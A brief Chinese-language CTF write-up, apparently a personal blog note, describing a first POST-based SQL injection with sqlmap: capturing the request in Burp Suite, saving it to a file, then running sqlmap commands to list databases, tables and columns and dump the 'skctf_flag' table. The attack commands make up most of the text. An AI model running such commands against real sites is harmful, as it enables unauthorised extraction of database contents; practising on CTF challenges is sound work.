手工注入的话就是常规了,不写了
记录第一次用sqlmap进行post注入
第一步,用bp拦截
然后选择Copy to file,保存为txt格式
我这里保存为a.txt
python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt --dbs
爆数据库
然后爆表
python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt --tables
爆列
python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt --columns
爆字段
python sqlmap.py -r C:\Users\ASUS\Desktop\a.txt -D skctf_flag -T fl4g -C "skctf_flag" --dump
完成任务